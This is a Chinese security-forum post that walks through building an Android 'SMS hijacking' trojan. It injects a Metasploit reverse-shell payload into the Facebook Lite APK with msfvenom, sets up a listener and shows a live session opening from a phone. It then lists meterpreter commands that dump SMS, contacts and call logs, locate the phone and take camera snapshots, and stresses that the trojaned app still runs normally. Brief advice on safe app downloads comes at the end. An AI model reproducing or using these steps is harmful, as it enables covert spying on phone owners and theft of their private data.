从“短信劫持马”的制作来谈App安全
看雪论坛作者ID:毅种循环
所以我们用一种 “ 寄生 ” 的方式来制作,后面会讲。
msfvenom --platform android -x facebook_lite.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.114 LPORT=3389 -o facebook_lite_after.apk
结果失败:失败一般会发生在 2,3,4 处,因为有一些 apk 加固或者混淆了,解包之后的代码已经变了样,插入会出现错误,打包也会出现错误。最终导致 apk 不完整,无法生成 apk。
platform 指定平台,此处为Android。
x 指定使用的样板,可以理解为你要寄生在哪个 app 下面,
此处是寄生在 facebook_lite.apk。
p 指定使用的 payload,此处是 android/meterpreter/
reverse_tcp,后面的 LHOST 指定 payload 生效后要反弹的主机 ip,一般为 kali 或者安装了 meterpreter 的 linux 主机,此处 kali 的 ip 为192.168.1.114,LPORT 为端口号。o 指定生成的文件。
msfpayload 和 msfencode 已经在新版本移除,以后只要使用 msfvenom 就行了,msfvenom 的大概使用说明如下:
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /opt/metasploit/apps/pro/msf3/msfvenom [options] <var=val>
Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder <encoder> The encoder to use
-a, --arch <arch> The architecture to use
--platform <platform> The platform of the payload
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
# 监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.114
LHOST => 192.168.1.114
msf exploit(handler) > set LPORT 3389
LPORT => 3389
msf exploit(handler) > exploit -j
[*] Started reverse handler on 192.168.1.114:3389
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.1.114:3389 -> 119.137.2.209:12398) at 2018-05-06 19:26:13 +0800
192.168.1.114:3389 -> 119.137.2.209:12398,这里后面的 119.137.2.209 这个是安装了 apk 的安卓手机的IP。
连接上之后,就可以进行相应的功能操作。
dump_calllog 通话记录。 dump_contacts 通讯录。 dump_sms 短信。 wlan_geolocate wifi 获取 gps 位置。 geolocate 经纬度。 sysinfo 系统信息。 ipconfig / ifconfig。 webcam_snap -i 1 或 2。
2:前置摄像头 。
用 MSF 去做木马,原来的文件和本身寄生后的文件,只有几 kb 的差距,而且原 App功能一切正常,以上功能都只需要安装打开就能做到。
2. 不要随意下载从网站上的App,有些App带了点什么你是完全不知道的,尽管提供App下载的站点是某某中心,尽量从官方和应用商店下载。
3. 有必要请加装手机杀毒软件。
看雪ID:毅种循环
https://bbs.pediy.com/user-784203.htm
推荐文章++++